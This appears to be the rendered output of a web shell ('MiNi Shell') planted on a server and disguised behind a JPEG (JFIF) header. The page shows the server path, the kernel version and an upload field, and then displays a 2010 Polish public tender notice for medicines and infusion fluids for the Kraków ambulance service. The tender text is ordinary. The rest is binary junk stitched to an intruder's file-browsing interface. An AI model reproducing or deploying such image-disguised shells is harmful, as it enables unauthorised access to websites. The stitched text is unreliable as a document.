JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100628/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100628/185478-N-2010.html

<p class="kh_header"><b>Kraków: dostawa leków gotowych oraz płynów infuzyjnych
do Apteki Zakładowej</b><br>
<b>Numer ogłoszenia: 185478 - 2010; data zamieszczenia: 28.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Krakowskie Pogotowie Ratunkowe , ul. Łazarza 14, 31-530 Kraków, woj. małopolskie, tel. 012 4244200, faks 012 4244300.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kpr.med.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa leków gotowych oraz płynów infuzyjnych
do Apteki Zakładowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa leków i płynów infuzyjnych do Apteki zakładowej przy ul. Łazarza 14 w Krakowie.
Zamówienie podzielone jest na dwie części :
1.	Część nr 1 zamówienia : dostawa leków gotowych, zgodnie z wykazem asortymentowym  
i ilościowym określonym w tabeli nr 2 załącznika nr 4 do niniejszej siwz, CPV - 24 40 00 00
2.	Część nr 2 zamówienia : dostawa płynów infuzyjnych, zgodnie z  wykazem asortymentowym  
i ilościowym określonym w tabeli nr 3 załącznika nr 4a do niniejszej siwz, CPV - 24 40 00 00
3.	Przedmiot zamówienia musi być dopuszczony do obrotu na terenie RP i do stosowania w jednostkach służby zdrowia.
4.	Oferty nie zawierające pełnego zakresu przedmiotu zamówienia w każdej z części zamówienia zostaną odrzucone.
5.	Zamawiający nie przewiduje możliwości stosowania zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt. 7.
6.	Zamawiający dopuszcza możliwość składania ofert częściowych na dowolną ilość części.
7.	Oferty nie zawierające pełnego zakresu przedmiotu zamówienia w poszczególnych częściach zostaną odrzucone.
8.	Nie dopuszcza się składania ofert wariantowych.
9.	Zamawiający nie przewiduje prowadzenia aukcji elektronicznej.
10.	Zamawiający nie przewiduje prowadzenia dynamicznego systemu zakupów.
11.	Zamawiający przewiduje zastosowanie prawa opcji opisanego w par. 1 projektu umowy, stanowiącego załącznik nr 3 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 24.40.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta winna być zabezpieczona wadium odpowiednio w  wysokości : 
1)	Część 1 zamówienia  3 200,00 PLN 
2)	Część 2 zamówienia     600,00 PLN
	
2.	Przy wnoszeniu wadium Wykonawca winien podać  numer i nazwę postępowania oraz której(ch) części zamówienia dotyczy(ą).
3.	Termin wnoszenia wadium upływa wraz z upływem terminu składania ofert tj. dnia 07.07.2010 r. do godz. 12:00 - (decyduje termin uznania rachunku bankowego Zamawiającego).
4.	Wadium może być wnoszone :
a)	w pieniądzu, przelewem na konto Krakowskiego Pogotowia Ratunkowego:
PKO Bank Polski Regionalny Oddział w Krakowie
Nr 92 1020 2892 0000 5902 0185 8430
b)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych, 
d)	w gwarancjach ubezpieczeniowych,
e)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 Ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109, poz. 1158 z późn. zmianami).
5.	Wadium wnoszone w formie: poręczenia bankowego, lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach, 
o których mowa w pkt. 4 lit. e) należy złożyć w formie oryginału w oddzielnej, opisanej zgodnie 
z pkt. X.11. siwz kopercie, w terminie określonym w pkt. VIII. 3, pod adresem podanym w pkt. XI.1. SIWZ.
6.	Z treści gwarancji (poręczenia) musi jednoznacznie wynikać jaki jest sposób reprezentacji Gwaranta. Gwarancja (poręczenie) musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta (Poręczyciela). Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska).
a)	Gwarancja (poręczenie) musi określać kwotę wadium oraz termin ważności gwarancji (poręczenia) oraz winno z niej wynikać, że Gwarant ( Poręczyciel) działając na zlecenie Wykonawcy gwarantuje nieodwołalnie i bezwarunkowo zapłatę kwoty wadium zgodnie z warunkami przystąpienia do postępowania zapisanymi w SIWZ.  
7.	Wykonawca, który nie wniesie wadium w wymaganej wysokości lub formie podlega wykluczeniu 
z postępowania o udzielenie zamówienia publicznego.
8.	Zwrot wadium nastąpi niezwłocznie : 
a)	po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt.10
b)	na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert,
c)	po podpisaniu umowy z Wykonawcą, którego oferta została wybrana,
d)	jeżeli upłynął termin związania ofertą,
e)	jeżeli Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
9.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi 
z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
10.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, 
o którym mowa w art. 26 ust. 3 ustawy nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
11.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
w  ofercie;
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
	12.	W ofercie należy dokładnie określić sposób zwrotu przez Zamawiającego wniesionego  wadium (tj. adres banku, numer konta).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	W postępowaniu mogą brać udział wykonawcy, którzy spełniają wymogi określone w art. 22 ustawy oraz nie podlegają wykluczeniu na podstawie art. 24 ustawy.
2.	Ocena spełniania warunków udziału w postępowaniu wykonawców zostanie dokonana w oparciu 
o dokumenty, o których mowa w pkt VI. SIWZ zgodnie z formułą : spełnia - nie spełnia dla każdego 
z dokumentów.



Wymagane dokumenty w celu  wykazania spełniania przez Wykonawcę warunków, o których mowa 
w art. 22 ust. 1 ustawy :

1)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania :  
a)	Oświadczenie nr 1 - Wykonawcy, pkt 1, (według wzoru stanowiącego załącznik nr 1 do SIWZ),
b)	koncesja - zezwolenie na prowadzenie hurtowni leków,
c)	zezwolenie - zgoda na obrót środkami odurzającymi (dotyczy części nr 1 zamówienia),</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	W postępowaniu mogą brać udział wykonawcy, którzy spełniają wymogi określone w art. 22 ustawy oraz nie podlegają wykluczeniu na podstawie art. 24 ustawy.
2.	Ocena spełniania warunków udziału w postępowaniu wykonawców zostanie dokonana w oparciu 
o dokumenty, o których mowa w pkt VI. SIWZ zgodnie z formułą : spełnia - nie spełnia dla każdego z dokumentów.


2)	posiadania wiedzy i doświadczenia :
       Oświadczenie nr 1 - Wykonawcy, pkt 2, (według wzoru stanowiącego załącznik nr 1 do SIWZ);</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	W postępowaniu mogą brać udział wykonawcy, którzy spełniają wymogi określone w art. 22 ustawy oraz nie podlegają wykluczeniu na podstawie art. 24 ustawy.
2.	Ocena spełniania warunków udziału w postępowaniu wykonawców zostanie dokonana w oparciu 
o dokumenty, o których mowa w pkt VI. SIWZ zgodnie z formułą : spełnia - nie spełnia dla każdego z dokumentów.

3)	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia : 
Oświadczenie nr 1 - Wykonawcy, pkt 3, (według wzoru stanowiącego załącznik nr 1 do SIWZ);</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	W postępowaniu mogą brać udział wykonawcy, którzy spełniają wymogi określone w art. 22 ustawy oraz nie podlegają wykluczeniu na podstawie art. 24 ustawy.
2.	Ocena spełniania warunków udziału w postępowaniu wykonawców zostanie dokonana w oparciu 
o dokumenty, o których mowa w pkt VI. SIWZ zgodnie z formułą : spełnia - nie spełnia dla każdego z dokumentów.

dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia : 
Oświadczenie nr 1 - Wykonawcy, pkt 3, (według wzoru stanowiącego załącznik nr 1 do SIWZ);</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	W postępowaniu mogą brać udział wykonawcy, którzy spełniają wymogi określone w art. 22 ustawy oraz nie podlegają wykluczeniu na podstawie art. 24 ustawy.
2.	Ocena spełniania warunków udziału w postępowaniu wykonawców zostanie dokonana w oparciu 
o dokumenty, o których mowa w pkt VI. SIWZ zgodnie z formułą : spełnia - nie spełnia dla każdego z dokumentów.

4)	sytuacji ekonomicznej i finansowej : 

a)	Oświadczenie nr 1 - Wykonawcy, pkt. 4 (według wzoru stanowiącego załącznik nr 1 do siwz),
b)	jeżeli Wykonawca polega na zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, wymaga się przedłożenia informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których te podmioty posiadają rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową podmiotu, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Wartość tych środków nie może być mniejsza niż :   100 000 zł dla części nr 1 zamówienia, 15 000 zł dla części nr 2 zamówienia, -  (§1 ust.3 Rozporządzenia Prezesa Rady Ministrów z dnia 30.12.2009 r. Dz.U. z 2009 r. nr 226,poz 1817),
c)	jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez zamawiającego  w pkt. VI.1.4) c) niniejszej SIWZ warunku. (art.26 uzt.2c ustawy).

5)	jeżeli Wykonawca polegać będzie na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia  innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, Wykonawca w takiej sytuacji zobowiązany jest złożyć pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (art.26 ust.2b ustawy).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie Wykonawcy - załącznik nr 1c do SIWZ</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	pełnomocnictwo - do reprezentowania wykonawcy w postępowaniu albo do reprezentowania wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę 
w postępowaniu o udzielenie zamówienia publicznego nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany niniejszej umowy wymagają formy pisemnej w postaci aneksu do umowy pod rygorem nieważności.
2.	Zmiany umowy nie mogą naruszać postanowień art. 144 ust. 1 Prawa zamówień publicznych, 
a potrzeba ich wprowadzenia może wynikać z następujących okoliczności :
1)      zmian regulacji prawnych obowiązujących w dniu podpisania umowy;
2)      gdy z przyczyn organizacyjnych konieczna będzie zmiana osób upoważnionych do   dokonywania czynności lub zmiana danych teleadresowych określonych w niniejszej umowie;
3)	oczywistych omyłek pisarskich w treści niniejszej umowy.
4)	zmian o których mowa w par. 1 ust.3, 4.
4)    w przypadku zmian cen urzędowych leków, stawki podatku VAT oraz udokumentowanej zmiany cen producenta.

par.1
3.	Zamawiający zastrzega sobie prawo opcjonalnego zwiększenia zamówienia do 20% wartości całkowitej umowy. 
4.	W razie wycofania z produkcji lub obrotu handlowego jakiegokolwiek asortymentu stanowiącego przedmiot umowy Zamawiający dopuszcza zastosowanie zamiennika o parametrach nie gorszych 
od oryginału,  pod warunkiem udokumentowania parametrów zamiennika i  faktu wycofania oryginału, oraz przedstawienia dokumentu potwierdzającego, że dostarczone materiały są dopuszczone do obrotu na terenie Rzeczypospolitej Polskiej oraz do stosowania w zakładach służby zdrowia i posiadają aktualne świadectwa rejestracji, zgodnie z przepisami ustawy 
z dnia 06.09.01 r.- Prawo Farmaceutyczne ( DZ.U. nr.126, poz.13810 z późn. Zm).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kpr.med.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> sekretariat Krakowskiego Pogotowia Ratunkowego - II piętro pok. 218
ul. Łazarza 14, 31-530 Kraków
- po wcześniejszym kontakcie telefonicznym..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.07.2010 godzina 12:00, miejsce: sekretariat Krakowskiego Pogotowia Ratunkowego, II piętro pok. 218
ul. Łazarza 14, 31-530 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1.	Część nr 1 zamówienia : dostawa leków gotowych, zgodnie z wykazem asortymentowym  
i ilościowym określonym w tabeli nr 2 załącznika nr 4 do niniejszej siwz, CPV - 24 40 00 00.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr. 1 zamówienia : Tabela nr 1 - LEKI			Załącznik nr 4 do siwz			Załącznik nr 1 do umowy		
Lp.	 Nazwa przedmiotu zamówienia 	j.m.	Ilość żądana
1	2 	5	6
1.	Acidum acetylosalicylicum 300 mg x 20 tabl	op.	650
2.	Adenosinum inj.2 ml x 6 amp	op.	50
3.	Adrenalinum inj. 1 mg/1 ml x 10amp.	op.	650
4.	Amiodaroni hydrochloridum inj.150 mg/3ml x 6amp	op.	150
5.	Antazolini mesylas 50 mg/ml x 10 amp	op.	70
